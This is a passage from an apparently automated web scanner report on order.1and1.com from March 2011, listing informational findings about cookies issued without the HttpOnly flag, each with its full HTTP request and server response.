Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:57:58 GMT; Path=/
ETag: ffe3148f77ea320c02a818d12e539d7c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18924


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.81. http://order.1and1.com/xml/order/FeatureSite-buildingDsc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingDsc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:42:12 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=6f93047c1ec73800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDsc;jsessionid=2C5BC2EEA9822D8D0B41D31E78D7098E.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.82. http://order.1and1.com/xml/order/FeatureSite-buildingDsc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:17 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=xZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:56:24 GMT; Path=/
ETag: 7ed80b0242401f3398613c8cd6784c77
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18703


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.83. http://order.1and1.com/xml/order/FeatureSite-buildingElements  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:17 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Gdms7Pj81Xl5eWGthaC5mYC0fKWJVTydVSEIqLisrKigqKCUlKCchJCgbHRwbGFRCbmNlcystKFgxW2owIyQgHyQgHiEfMDgvLjdvcDYrMmJrMSQlISAlIh8iHSA4MTI=; Expires=Fri, 07-Apr-2079 21:57:24 GMT; Path=/
ETag: 36e58228274f63c60138fce36fb995c9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20878


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.84. http://order.1and1.com/xml/order/FeatureSite-buildingElements  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingElements HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:13 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2e6b9e6419f16800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingElements;jsessionid=E84431486E0F8FF18F5CC004E97A0DC6.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.85. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMailinglist

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingMailinglist;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=DYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkuNWVuNCcoJCMoJSIlICMkHR4=; Expires=Fri, 07-Apr-2079 21:59:35 GMT; Path=/
ETag: a0504884b1215fb9f46eacf2501db275
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16994


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.86. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMailinglist

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingMailinglist HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:16 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=19d9d648f2500000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist;jsessionid=70DD629BD13A168599BD366FA123B51E.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.87. http://order.1and1.com/xml/order/FeatureSite-buildingMap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:37 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:57:44 GMT; Path=/
ETag: 645ffb56b5336d5e93c4fb610365ea26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18055


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.88. http://order.1and1.com/xml/order/FeatureSite-buildingMap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingMap HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:24 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=9f2e578a0ee4400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMap;jsessionid=0A6666D5BF90393E057AAA728205379C.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.89. http://order.1and1.com/xml/order/FeatureSite-buildingNet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingNet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingNet HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:42:04 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=6f0d5596d7138000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingNet;jsessionid=C26A64D1473293F0BCEF8E2C3B082574.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.90. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=FYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 21:56:52 GMT; Path=/
ETag: 5997c61d42885f593110bfffe26fb460
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19309


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.91. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingPhotogallery HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:42:24 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=625c83a492d9a400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery;jsessionid=0D01B726EB07D8A798F963D828852BA4.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.92. http://order.1and1.com/xml/order/FeatureSite-buildingRss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingRss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingRss;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:47 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:59:54 GMT; Path=/
ETag: 01cb6755ce08df139a4b6b446abadd19
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18568


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
